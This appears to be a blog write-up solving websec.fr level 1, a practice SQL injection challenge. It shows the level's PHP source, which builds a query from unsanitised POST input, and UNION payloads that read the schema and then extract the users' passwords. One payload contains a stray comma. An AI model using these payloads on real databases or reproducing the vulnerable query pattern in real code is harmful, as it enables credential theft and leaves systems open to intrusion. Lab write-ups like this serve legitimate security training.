Websec.fr level 1 - baby steps
The level
source code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
session_start ();
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL);
include 'anti_csrf.php';
init_token ();
class LevelOne {
public function doQuery($injection) {
$pdo = new SQLite3('database.db', SQLITE3_OPEN_READONLY);
$query = 'SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1';
$getUsers = $pdo->query($query);
$users = $getUsers->fetchArray(SQLITE3_ASSOC);
if ($users) {
return $users;
}
return false;
}
}
if (isset ($_POST['submit']) && isset ($_POST['user_id'])) {
check_and_refresh_token();
$lo = new LevelOne ();
$userDetails = $lo->doQuery ($_POST['user_id']);
}
?>
so we can see that the query
1
$query = 'SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1';
selects id, username from users where id is something. Great!
we want to UNION another query that will take a password, or something that can give us the flag. Let’s check the sql scheme from sqlite_master
1
1, UNION SELECT 1,sql FROM sqlite_master
(Remember, the union sql has to be the same amount of columns as the first sql query)
Look ! we have a password field, lets try to get that
1
1 UNION SELECT id, password FROM users WHERE id=1
so that complete sql query is
1
2
3
SELECT id, username FROM users WHERE id=1
UNION
SELECT 1, password FROM users WHERE id=1 LIMIT 1;
Got it ! Thanks for reading
This post is licensed under CC BY 4.0 by the author.